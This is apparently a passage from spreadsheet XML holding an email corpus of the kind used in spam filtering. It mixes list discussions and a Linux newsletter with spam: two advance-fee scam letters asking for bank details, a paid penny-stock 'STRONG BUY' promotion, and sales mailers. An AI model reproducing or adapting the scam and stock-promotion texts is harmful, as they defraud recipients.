value="nf"&gt;Norfolk Island&lt;option value="mp"&gt;Northern Mariana Islands&lt;option value="no"&gt;Norway&lt;option value="om"&gt;Oman&lt;option value="pk"&gt;Pakis!
 tan&lt;option value="pw"&gt;Palau&lt;option value="pa"&gt;Panama&lt;option value="pg"&gt;Papua New Guinea&lt;option value="py"&gt;Paraguay&lt;option value="pe"&gt;Peru&lt;option value="ph"&gt;Philippines&lt;option value="pn"&gt;Pitcairn Island&lt;option value="pl"&gt;Poland&lt;option value="pt"&gt;Portugal&lt;option value="pr"&gt;Puerto Rico&lt;option value="qa"&gt;Qatar&lt;option value="re"&gt;Reunion&lt;option value="ro"&gt;Romania&lt;option value="ru"&gt;Russia&lt;option value="rw"&gt;Rwanda&lt;option value="gs"&gt;S.Georgia &amp;amp; S.Sandwich Isles&lt;option value="kn"&gt;Saint Kitts &amp;amp;amp; Nevis&lt;option value="lc"&gt;Saint Lucia&lt;option value="vc"&gt;Saint Vincent&lt;option value="ws"&gt;Samoa&lt;option value="sm"&gt;San Marino&lt;option value="st"&gt;Sao Tome and Principe&lt;option value="sa"&gt;Saudi Arabia&lt;option value="sn"&gt;Senegal&lt;option value="sc"&gt;Seychelles&lt;option value="sl"&gt;Sierra Leone&lt;option value="sg"&gt;Singapore&lt;option value="sk"&gt;Slovakia&lt;option value="si"&gt;Slovenia&lt;option value="so"&gt;Somalia&lt;option value="za"&gt;South Africa&lt;option value="es"&gt;Spain&lt;option value="lk"&gt;Sri Lanka&lt;option value="sh"&gt;S!
 t. Helena&lt;option value="pm"&gt;St. Pierre and Miquelon&lt;option value="sr"&gt;Suriname&lt;option value="sj"&gt;Svalbard&lt;option value="sz"&gt;Swaziland&lt;option value="se"&gt;Sweden&lt;option value="ch"&gt;Switzerland&lt;option value="tw"&gt;Taiwan&lt;option value="tj"&gt;Tajikistan&lt;option value="tz"&gt;Tanzania&lt;option value="th"&gt;Thailand&lt;option value="tg"&gt;Togo&lt;option value="tk"&gt;Tokelau&lt;option value="to"&gt;Tonga&lt;option value="tt"&gt;Trinidad and Tobago&lt;option value="tn"&gt;Tunisia&lt;option value="tr"&gt;Turkey&lt;option value="tm"&gt;Turkmenistan&lt;option value="tc"&gt;Turks and Caicos Islands&lt;option value="tv"&gt;Tuvalu&lt;option value="um"&gt;U.S. Minor Outlying Islands&lt;option value="ug"&gt;Uganda&lt;option value="ua"&gt;Ukraine&lt;option value="ae"&gt;United Arab Emirates&lt;option value="uk"&gt;United Kingdom&lt;option value="uy"&gt;Uruguay&lt;option value="uz"&gt;Uzbekistan&lt;option value="vu"&gt;Vanuatu&lt;option value="va"&gt;Vatican City&lt;option value="ve"&gt;Venezuela&lt;option value="vn"&gt;Vietnam&lt;option value="vi"&gt;Virgin Islands&lt;option value="wf"&gt;Wallis and Futuna Islands&lt;option value="eh"&gt;W!
 estern Sahara&lt;option value="ye"&gt;Yemen&lt;option value="yu"&gt;Yugoslavia (Former)&lt;option value="zr"&gt;Zaire&lt;option value="zm"&gt;Zambia&lt;option value="zw"&gt;Zimbabwe&lt;/select&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;Telephone:*&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font color="#FFFFFF" size="3" face="Arial"&gt;&lt;INPUT TYPE="TEXT" NAME="phone" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;Mobile&amp;nbsp;/&amp;nbsp;Work:*&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font color="#FFFFFF" size="3" face="Arial"&gt;&lt;INPUT TYPE="TEXT" NAME="phone_2" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#FFFFFF" size="3"&gt;Fax:&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font color="#FFFFFF" size="3" face="Arial"&gt;&lt;INPUT TYPE="TEXT" NAME="fax" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTE!
 R&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;Email&amp;nbsp;Address:*&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font color="#FFFFFF" size="3" face="Arial"&gt;&lt;INPUT TYPE="TEXT" NAME="email" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;/td&gt;&lt;td width="75%"&gt;&lt;p&gt;&lt;font color="#ffffff" size="3" face="Arial"&gt;* Required Fields&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="42%"&gt;&lt;/td&gt;
     &lt;td width="75%"&gt;&lt;font face="Arial"&gt;&lt;INPUT TYPE="HIDDEN" NAME="required" VALUE="email"&gt;
 &lt;INPUT TYPE="HIDDEN" NAME="group1" VALUE="investors"&gt;
 &lt;INPUT TYPE="HIDDEN" NAME="subscribe_redirect" VALUE="http://62.232.161.231/freeinfo/thanx.htm"&gt;
 &lt;INPUT TYPE="HIDDEN" NAME="unsubscribe_redirect" VALUE="http://62.232.161.231/freeinfo/sorry.htm"&gt;
 &lt;INPUT TYPE="HIDDEN" NAME="verify_redirect" VALUE="http://62.232.161.231/freeinfo/confirm.htm"&gt;
 &lt;P&gt;
 &lt;INPUT TYPE="SUBMIT" VALUE="Subscribe"&gt;
       &lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/FORM&gt;&lt;/center&gt;&lt;/center&gt;&lt;/TD&gt;&lt;/TR&gt; 
               &lt;TR&gt;
                 &lt;TD align=middle width="354"&gt;
                   &lt;DIV align=center&gt;&amp;nbsp;&lt;/DIV&gt;
                   &lt;DIV align=center&gt;&amp;nbsp;&lt;/DIV&gt;
                   &lt;DIV align=center&gt;v&lt;/DIV&gt;
                   &lt;DIV align=center&gt;&lt;img border="0" src="http://62.232.161.231/freeinfo/images/sept.jpg" width="190" height="167"&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;/FORM&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Slaughter in the Name of God
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: Stephen D. Williams [mailto:swilliams@hpti.com]
 &gt; 
 &gt; Just to further weaken the food transaction argument, I'll note that
 in
 &gt; my neighborhood, the local McDonalds won't even hand you your drink in
 &gt; the drive through until you fork over the cash.  
 Maybe you never bought a hot dog from a street vendor.
 &gt; And why is it that the margin of survival is so thin?  Could it be
 that
 &gt; all of these tribal rivalries are part of what's holding back
 wholesale
 &gt; movement to the modern, first world patterns of constructive thinking?
 Well, yes.  But it doesn't change the idea that the margin of survival
 probably IS that thin in this region.
 &gt; I'm sure that both sides were ready to be the agressor.  
 I'm not.  I'm sure both sides were equally ready to be the aggressor
 provided they were in a predominant position of power.
 &gt; Bush's reluctance to blast blind obeyance of religion as taught by
 your
 &gt; local madrassa or KKK leader, apparently because he is fully involved
 &gt; with the general effort to expand unfettered religiosity as the
 solution
 &gt; to the world's ills, is disappointing.  He has spoke against madrassa,
 &gt; but what I heard sounded lame and carefully crafted to shield religion
 &gt; in general from scrutiny.
 1. Which religion and how it is currently being expressed matters.
 2. The US is trying to avoid making war on the Muslim religion.
 3. US Leadership remains reflexively multi-cultural.
 &gt; We all have
 &gt; disagreements, but at some point it becomes a crime against humanity.
 I didn't say burning the train was a good thing.  I said I understood it
 wasn't a spontaneous attack on people who had done no wrong.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Penguin Shell]  Retail Ready
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020717.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020717.html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&lt;/style&gt;&lt;title&gt;20020717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07.17.2002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I've very excited about the in-planning Penguin Shell volunteer project. 
 Apparently, you are too. I've received more than 100 emails from readers &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell Volunteer 
 Skills"&gt;volunteering&lt;/a&gt; a wide range of IT skills for charitable organizations. 
 Linux users, Windows users, even a few Mac users are ready, willing and able to 
 spend their own precious off time providing qualified technical skills for a 
 good cause. I've also gotten more than two dozen suggestions for &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell Organization 
 Suggestion"&gt;organizations&lt;/a&gt; that might be in need of such skills. And, I've 
 seen some very interesting suggestions for &lt;a 
 href="mailto:tony@Lockergnome.com?subject=Penguin Shell Volunteer name 
 suggestion"&gt;names&lt;/a&gt; for our project. Feel free to click through on any of the 
 above links to join the ever-growing bandwagon. Do me a favor, though. keep the 
 subject lines intact. It's the only way your messages will filter and sort 
 through my email system.&lt;p&gt;
 It looks like Apple may have crossed a line of irritation with its users. 
 According to &lt;a href="http://theregister.co.uk/content/4/26269.html" 
 target="_blank"&gt;this&lt;/a&gt; article on &lt;a href="http://theregister.co.uk/" 
 target="_blank"&gt;The Register&lt;/a&gt;, Apple has tacked a $100 annual fee on its
 previously free mac.com email service. It's also set the price for an OS 10.2
 upgrade at $129.&lt;p&gt;
 I won't question Apple's decision too much. Instead, it really proves how 
 difficult things have become in the tech world in the past few years. Revenues, 
 by and large, are still decreasing from the pie-in-the-sky late 90s and early 
 2000. That's left companies to scramble for new sources of income, some of which 
 were previously free. Even we at Lockergnome have felt the pinch in the past few 
 years. Never fear, though. Chris has assured us that the newsletters will remain 
 free. We have, however, begun to explore alternative income &lt;a 
 href="http://www.gnometomes.com/" target="_blank"&gt;sources&lt;/a&gt;.&lt;p&gt;
 On a brighter note, it looks like &lt;a href="http://www.mandrake.com/" 
 target="_blank"&gt;Mandrake&lt;/a&gt; has found a sweet spot. According to their most 
 recent shareholder's report, the third quarter was the strongest in the 
 company's
 history, with 1.6 million Euro (1.61 million US) in revenue. That doesn't put
 them in the black, though. According to MandrakeSoft, the strong quarter will
 only decrease operating losses. I have to wonder how much of this revenue was
 the result of the &lt;a
 href="http://mandrakelinux.com/en/club/"target="_blank"&gt;Mandrake Linux User's
 Club&lt;/a&gt;.&lt;p&gt;
 The news also makes me want to pay a bit more attention to Mandrake's newest
 partnership venture, an agreement with &lt;a href="http://www.microtel.com/"
 target="_blank"&gt;Microtel&lt;/a&gt; to provide Mandrake-loaded computers for sale on &lt;a
 href="http://www.walmart.com/catalog/product_listing.gsp?cat=102252&amp;dept=3944&amp;path=0%3A3944%3A3951%3A41937%3A86796%3A102252" target="_blank"&gt;WalMart.com&lt;/a&gt;.
 I would never have guessed that WalMart would lead the consumer Linux machine
 charge. They've had Mandrake boxes available for several months. Now, with the 
 addition of both &lt;a href="http://www/lindows.com/" target="_blank"&gt;Lindows&lt;/a&gt; 
 and Mandrake-equipped computers, they seem surprisingly ahead of the retail 
 computer pack. Let's hope for the best for all involved.&lt;p&gt;
 Have a great Wednesday.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Checking Mail With KMail&lt;/b&gt;&lt;p&gt;
 I've recently become a KDE convert - impressed enough with KDE-3 to move me from 
 my longtime desktop friend Gnome. While I use a combination of fetchmail, 
 procmail and pine for reading and filtering my email, KMail is a strong 
 contender in the email race. As you'd guess, it's fully integrated into the KDE 
 desktop, ready for a quick setup and easy use.&lt;p&gt;
 There's one drawback to KMail, though, in my opionion. That's that it doesn't 
 automatically check your email by default when the program is opened. As much 
 time as I spend talking about saving key and mouse strokes, you knew the 
 additional step to check your email after opening the program would be an 
 irritation to this Penguin. However, changing the problem is a quick and simple 
 configuration issue.&lt;p&gt;
 To force KMail to check your email when opened, right-click on the KMail icon in 
 your KDE panel. Select "Preferences" and the "Execute" tab. In the Execute 
 window, change the command line to read:&lt;p&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;kmail --check -caption "%c" %i %m&lt;p&gt;
 The addition of the --check option will force KMail to bring you your mail when 
 you open the program.&lt;p&gt;
 Fewer keystrokes make a happy geek, right?&lt;p&gt; &lt;p&gt;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XIII&lt;/b&gt;&lt;p&gt;
 As you well know, Linux is simply the most robust operating system for 
 networking around. With its roots squarely in the network, Linux has managed to 
 stay ahead of the pack in virtually every respect related to networks. It should 
 come as little suprise, then, that the network section of your Linux kernel 
 configuration is dense with details and options.&lt;p&gt;
 I will say that I warned you on Monday - there are going to be some sections of 
 the kernel configuration series where I just can't give you a stock 
 configuration that will work in every case. Networking is one of those areas. 
 You're going to have to give some thought as to how your network is or will be 
 used and the level of security you want to provide (both internal and external). 
 Then, it's a matter of finding the solutions to those options.&lt;p&gt;
 For security issues, I can recommend several good articles and HowTos:&lt;p&gt;
 &lt;a class="url" 
 href="http://www.linux.org/docs/ldp/howto/Security-Quickstart-HOWTO/index.html"&gt;The Linux Security Quickstart HowTo&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&amp;nbsp;covers security on a high level, with a good discussion of kernel 
 configuration issues&lt;p&gt;
 &lt;a class="url" href="http://www.linuxplanet.com/linuxplanet/tutorials/211/1/" 
 target="_blank"&gt;Linux Network Security from Linux Planet&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&amp;nbsp;a nice tutorial on network security&lt;p&gt;
 &lt;a class="url" href="http://www.linuxgazette.com/issue77/lechnyr.html" 
 target="_blank"&gt;Network Security with /proc/sys/net/ipv4&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&amp;nbsp;other approaches to network security&lt;p&gt;
 These should get you started. Tomorrow, we'll cover telephony support in your 
 Linux kernel.&lt;p&gt;&lt;p&gt;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&lt;b&gt;PyMP3Cut&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" 
 href="http://www.librelogiciel.com/software/PyMP3Cut/"&gt;http://www.librelogiciel.com/software/PyMP3Cut/&lt;/a&gt;&lt;p&gt;
 "PyMP3Cut is a Python commandline tool designed to cut huge (&gt; 100MB) MP3 files 
 at high speed without requiring the extra disk space and processing time usually 
 needed by visual audio editing tools, which convert the MP3 format to more 
 easily manageable formats like WAV before doing anything. It reads and cuts 
 simultaneously according to the autodetected MP3 frame rate and a timeline 
 passed as a commandline argument."&lt;p&gt;&lt;p&gt;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&lt;b&gt;More Windows for Linux&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Ken Knull&lt;/span&gt;&lt;p&gt;
 "I'm reading your Codeweavers/CrossOver project stuff, and have comments
 on another option I use.&lt;p&gt;
 "I have been using Win4Lin ( &lt;a href="http://www.netraverse.com/" 
 target="_blank"&gt;http://www.netraverse.com/&lt;/a&gt; ) for several
 months now, on an i686 boxen which runs RH 7.2, and now also
 most windoze (nonXP / NTFS apps).&lt;p&gt;
 "I love it, and highly recommend it, and if you'd like more details /
 data let me know."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Linux PR&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://linuxpr.com/"&gt;http://linuxpr.com/&lt;/a&gt;&lt;p&gt;
 If the daily Linux news sites are starting to get you down, maybe it's time for 
 a change. Linux PR is an up-to-the-minute listing of events and developments in 
 the Linux world. The layout is attractive, with all the most recent articles in 
 descending order on the front page. It makes quick scans easy. The only real 
 downside to the news on the site is that some of it is very, very 
 company-oriented - clearly the work of PR firms cranking out press releases. 
 Other than that, Linux PR is a useful site for checking in and keeping up on 
 your favorite OS.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/20020717.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020717.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@example.com]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</si>
  <si>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
 On Mon, 09 Sep 2002 12:05:55 PDT,
 	Rick Baartman &lt;baartman@lin12.triumf.ca&gt; wrote:
 &gt; Is there a way to do a global Sort command? Here's the situation:
 &gt; I like to sort by date every folder. I'm cleaning up my inbox from
 &gt; most recent to oldest, since I find this direction most efficient (I
 &gt; guess because it helps me recognize the significance of individual,
 &gt; old messages). But this adds messages to my other folders in the
 &gt; wrong order. When I'm done, I'd like to re-sort all the folders I've
 &gt; changed.
 I don't understand.  How does sorting one folder add messages to
 other folders?  What do you use to sort?
 Tom
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Relationship
</t>
  </si>
  <si>
    <t xml:space="preserve">--===_SecAtt_000_1fheucnqggtggp
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: quoted-printable
 URGENT PRIVATE &amp; EXTREMELY CONFIDENTIAL
 Dear =2C
 With profound interest and in utmost confidence=2C I am
 soliciting your immediate assistance or co-operation
 as to enable us round up an opportunity within my
 capability as a result of the death of one of our
 contractor =28Beneficiary=29=2E You should not be surprised
 as to how I got your contact=2C you were highly
 recommended to me with the believe that you are
 competent=2C reliable=2C Trustworthy and confident=2E
 I am  Dr=2E Bello Ahmed=2C Chief Auditor=2C Special Project
 and Foreign Contract Regularization and Disbursement=2C
 in the Office of the Auditor General of the Federation
 of Federal Republic of Nigeria=2E We work in hand with
 the Senate Committee on Foreign Contract Payment=2E Our
 duty is to ensure that all contractors are paid their
 contract sum in due time=2E
 This last payment quarter=2C a total of 30 contractors
 were short listed for payment and about 25 of them
 have been paid remaining about 5 =28Five=29=2C information
 reaching this office indicates that one among the
 remaining has been reported dead=2E His name is Mr=2E
 Gerrand Schwartz from Sweden=2C he died in the last Air
 France Concorde plane crash=2E Meanwhile he finished the
 execution of his contract December 19th 1999=2E But
 since his death=2C nobody has come forward to put a
 claim to his contract fund which is about
 US$15=2C500=2C000=2E00 Million =28fifteen Million Five
 Hundred Thousand U=2ES Dollars=29 that is why I need your
 immediate assistance to expedite the transfer of the
 contract amount=2E
 With my position as a Director  in the Department of
 Contract Regularisation and Disbursement=2C I will
 regularize all the necessary documents and present
 your company as the bona-fide beneficiary of this fund
 in as   much as you respond within 48 hours for
 respect of this important message=2E Your unreserved
 cooperation in this business is just what we require
 for a successful and hitch =96 free transaction=2E
 Necessary measures to ensure a risk =96 free and fool
 proof transaction and confidentiality has been taken=2E
 Kindly signify your interest by replying via my
 personal e =96mail address above=2E Upon receipt of your
 positive reply we shall discuss on =281=29 Basic Program
 for Operation =282=29 Financial Status as to ascertain
 your capability=2E  Upon completion of this transaction
 I have decided to give you 30% of the total sum=2C 60%
 of the fund which is our share will be used for
 investment in your company or in any other company of
 our choice=2E While10% has been mapped out to take care
 of any minor expenses incurred=2E Take note that this
 project will last for only 21 working days=2E
 I expect your response in time =28within 48 hours=29 as
 time is of great essence in this transaction=2E
 God Bless and Kind Regards=2C
 Dr=2E Bello Ahmed
 --===_SecAtt_000_1fheucnqggtggp
 Content-Type: application/octet-stream; name="111111111111111111.txt"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment; filename="111111111111111111.txt"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: URGENT BUSINESS ASSISTANCE
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --=====================_889472414==_
 Content-Type: text/plain
 Content-Transfer-Encoding: 8bit
 UNION BANK OF NIG LTD.
 35 MARINA,
 LAGOS ISLAND
 DEAR Sir,
 First, I must solicit your confidence in this transaction, this  is by virture of its nature as being utterly confidencial and top secret. though i know that a transaction of this magnitude will make any one apprehensive and worried, but i am assuring you that all will be well at the end of theday. we have decided to contact you due to the urgency of this transaction,let me start by introducing myself properly to you. I am the manager Bills and Exchange of Foreign Remittance department of Union Bank of NIgeria (U.B.N. Headquarters Lagos NIgeria) formally Union Bank of Switzerland (UBS-AG Zurich Switzerland). In accordance with Federal Government Policies on indiginalization Law on company and Allied matters of Jan 1977. I am writing you this letter to ask for your support and co-operation to carry out this transaction.We discovered an abandoned sum of US$20 million(twenty million US Dollars) in an account that belongs to one of our Foreign customer who died along side his entire family in November 1997 in a plane crash. Since this development,we have advertised for his next of kin or any close relation to come forward to claim this money, but nobody came to apply for the claim. To this effect,I and two other officials in my department, have decided to look for a trusted foreign partner who can stand in as the next of kin to the deceased and claim this money.We need a foreign partner to apply for the claim because of the fact that the customer was a foreigner and we don't want this money to go into the Banks Treasury as unclaimed fund. Every document to affect this process will emanate from my table and I will perfect every documentto be in accordance with the banking law and guidelines,
 So you have nothing to worry about.We have agreed that 20% of the money
 will be for you, 10%for expenses incurred on both sides, 10% will be
 donated to the charity organization while 60% will be for my colleagues
 and I.  If you are going to help me, indicate by replying this letter
 and putting in your BANK PARTICULARS, PRIVATE TELEPHONE AND FAX NUMBERS.
 I await your immediate reply to enable us start this transaction in earnest.
 Once I receive your reply, I will send you the Text of Application for
 immediate Application of Claim.
 Thanks for your anticipated assistance.
 Yours faithfully,
 DR.WALTER IBE
 --=====================_889472414==_
 Content-Type: text/html
 Content-Transfer-Encoding: 8bit
 &lt;html&gt;
 &lt;body&gt;
 &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;UNION BANK OF NIG LTD.
 &lt;br /&gt;
 35 MARINA,
 &lt;br /&gt;
 LAGOS ISLAND
 &lt;br /&gt;
 &lt;br /&gt;
 DEAR Sir,
 &lt;br /&gt;
 &lt;br /&gt;
 First, I must solicit your confidence in this transaction, this  is by virture of its nature as being utterly confidencial and top secret. though i know that a transaction of this magnitude will make any one apprehensive and worried, but i am assuring you that all will be well at the end of theday. we have decided to contact you due to the urgency of this transaction,let me start by introducing myself properly to you. I am the manager Bills and Exchange of Foreign Remittance department of Union Bank of NIgeria (U.B.N. Headquarters Lagos NIgeria) formally Union Bank of Switzerland (UBS-AG Zurich Switzerland). In accordance with Federal Government Policies on indiginalization Law on company and Allied matters of Jan 1977. I am writing you this letter to ask for your support and co-operation to carry out this transaction.We discovered an abandoned sum of US$20 million(twenty million US Dollars) in an account that belongs to one of our Foreign customer who died along side his entire family in November 1997 in a plane crash. Since this development,we have advertised for his next of kin or any close relation to come forward to claim this money, but nobody came to apply for the claim. To this effect,I and two other officials in my department, have decided to look for a trusted foreign partner who can stand in as the next of kin to the deceased and claim this money.We need a foreign partner to apply for the claim because of the fact that the customer was a foreigner and we don't want this money to go into the Banks Treasury as unclaimed fund. Every document to affect this process will emanate from my table and I will perfect every documentto be in accordance with the banking law and guidelines,
 &lt;br /&gt;
 So you have nothing to worry about.We have agreed that 20% of the money
 &lt;br /&gt;
 will be for you, 10%for expenses incurred on both sides, 10% will be
 &lt;br /&gt;
 donated to the charity organization while 60% will be for my colleagues
 &lt;br /&gt;
 and I.  If you are going to help me, indicate by replying this letter
 &lt;br /&gt;
 and putting in your BANK PARTICULARS, PRIVATE TELEPHONE AND FAX NUMBERS.
 &lt;br /&gt;
 &lt;br /&gt;
 I await your immediate reply to enable us start this transaction in earnest.
 &lt;br /&gt;
 Once I receive your reply, I will send you the Text of Application for
 &lt;br /&gt;
 immediate Application of Claim.
 &lt;br /&gt;
 &lt;br /&gt;
 Thanks for your anticipated assistance.
 &lt;br /&gt;
 &lt;br /&gt;
 Yours faithfully,
 &lt;br /&gt;
 &lt;br /&gt;
 DR.WALTER IBE
 &lt;br /&gt;
  &lt;/font&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 --=====================_889472414==_--
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; My tests train on about 7,000 msgs, and a binary pickle of the database is
 &gt; approaching 10 million bytes.
 That shrinks to under 2 million bytes, though, if I delete all the WordInfo
 records with spamprob exactly equal to UNKNOWN_SPAMPROB.  Such records
 aren't needed when scoring (an unknown word gets a made-up probability of
 UNKNOWN_SPAMPROB).  Such records are only needed for training; I've noted
 before that a scoring-only database can be leaner.
 In part the bloat is due to character 5-gram'ing, part due to that the
 database is brand new so has never been cleaned via clearjunk(), and part
 due to plain evil gremlins.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Weekly Stock Report vjf
</t>
  </si>
  <si>
    <t xml:space="preserve">GAMING ADVISOR  
 NEWS July 16, 2002   i2corp Enters into Research and Development Agreement with Nevada Gaming Equipment Supplier For Live Remote Bingo.      
 The general feeling of the Top Internet Lawyers and Analysts is that "online gambling and sports betting is here to stay. Attempts at trying to stop it would be largely ineffective! Banning Internet gambling and sports betting presents technical and legal problems that Governments are ill equipped to enforce. 
 Whats more, there are NO competitors for the Companys method or technology for remote wagering. i2corp is the Only Company in the World that can legally license its method and technology for remote wagering. i2corp is currently negotiating with
 Major Casinos Globally.    
 Michael Pollock of the Pollock Gaming Resource Group (PRRG) has issued a report studying the effects of live wagering from remote locations.  The study concludes that live wagering from remote locations does more than create a new source of revenue for sponsoring casinos. Additionally, it creates a marketing opportunity, a means to find and cultivate thousands of new customers who can be encouraged to become on-site patrons. A copy of the full report in pdf format can be downloaded at http://www.gamingobserver.com/.
 i2corp is the holding company for Home Gambling Network, Inc. HGN holds U.S. Patent 5,800,268, which covers remote wagering on live games and events with electronic financial transactions. The Patent is comprised of three primary actions: the gambling is live; the player is remote and physically away from the actual game or event; and the winnings and losses are transacted electronically in real time. They include, but are not limited to, horse racing, soccer, bingo, poker, roulette and many other Las Vegas Casino Games. 
 FACT: Currently there is an overwhelming opinion that remote wagering in real-time will become one of the most profitable/prolific industries worldwide. i2corp recently won judgment against giant UUNET a subsidiary of MCI/WorldCom in a U.S. Federal Court for Patent infringement. Just another compelling reason why i2corp has orphaned their competition! Therefore we conclude i2corps common stock to be overlooked and undervalued! 
 RECOMMENDATION: STRONG BUY
      i2corp   
 OTCBB Symbol                  (ITOO)
 Recent Price     	          .05 - .08
 52-Week Hi-Lo 	          .05 - .48
 Short Term Target Price:     .60
 This news release contains forward-looking statements as defined by the Private Securities Litigation Reform Act of 1995. Forward-looking statements include statements concerning plans, objectives, goals, strategies, future events or performance and underlying assumptions, and all statements that are other than statements of historical facts. These statements are subject to uncertainties and risks including, but not limited to, product and service demand and acceptance, changes in technology, economic conditions, the impact of competition and pricing, government regulation, and other risks defined in this document. These cautionary statements expressly qualify all such forward-looking statements made by or on behalf of Gaming Advisor. In addition, Gaming Advisor disclaims any obligation to update any forward-looking statements to reflect events or circumstances after the date hereof. The information herein has been obtained from reputable sources and therefore we assume its v
  alidity. Gaming Advisor has been c
 ompensated $5,000 for the dissemination of this information and may at anytime buy or sell the securities of i2corps common stock.
 nywguempturgwthionjpsqdw
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Offer Your Clients 11.19%
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_4365A_01C1FB64.2F304B00
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Offer your clients 11.19%	
  *Rake not included	 While getting 5.5% Comission and a bonus for
 yourself!	
   _____  
  ? 11.19% First Year (5.9% first year rate PLUS 5% premium bonus)
 ? 5.5% Commission*, plus bonus (call for details)
 ? Full death benefit
 ? 10% free withdrawal after one year
 ? Great for 1035's and transfers
   _____  
  Free "A Salute to America" CD for the first 100 callers!	
 Call or e-mail &lt;mailto:StandardLife@SMANCorp.com&gt;  us today!
  800-767-7749
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
 Visit us online at: www.StandardAgents.com
 &lt;http://www.standardagents.com&gt;  
 *Commission reduces at older ages. For agent use only.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------=_NextPart_000_4365A_01C1FB64.2F304B00
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Offer Your Clients 11.19%&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/slii/20020507-101.jpg" width=3D"550" =
 height=3D"56" alt=3D"Offer your clients 11.19%"&gt;&lt;/td&gt;
